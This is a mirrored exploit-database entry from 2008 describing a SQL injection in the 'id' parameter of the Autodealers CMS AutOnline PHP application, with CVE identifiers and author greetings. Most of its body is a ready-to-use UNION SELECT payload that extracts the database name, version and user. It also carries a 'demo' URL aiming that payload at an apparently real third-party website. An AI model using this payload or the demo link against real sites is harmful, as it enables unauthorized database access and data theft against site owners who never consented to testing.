[] NeoSense
E X P L O I T S
title author type platform port cve id

Autodealers CMS AutOnline - 'id' SQL Injection

Author: ZoRLu
type: webapps
platform: php
port: 
date_added: 2008-09-10 
date_updated: 2016-12-21 
verified: 1 
codes: OSVDB-48168;CVE-2008-4074;CVE-2008-4073 
tags: 
aliases:  
screenshot_url:  
application_url: 
############################################################################################################
[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
[+] Discovered By ZoRLu
[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org & darkc0de.org
[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
[+] trt-turk@hotmail.co  &  zorlu@w.cn
############################################################################################################
[+]
[+]
[+]
[+]

   exploit:
http://localhost/script_path/index.php?page=detail&id=[SQL]

[+]
[+]
[+]
[+]

   [SQL]=
ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

[+]
[+]
[+]
[+]
[+]

   demo:
http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

[+]
[+]
[+]
[+]
############################################################################################################

# milw0rm.com [2008-09-11]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.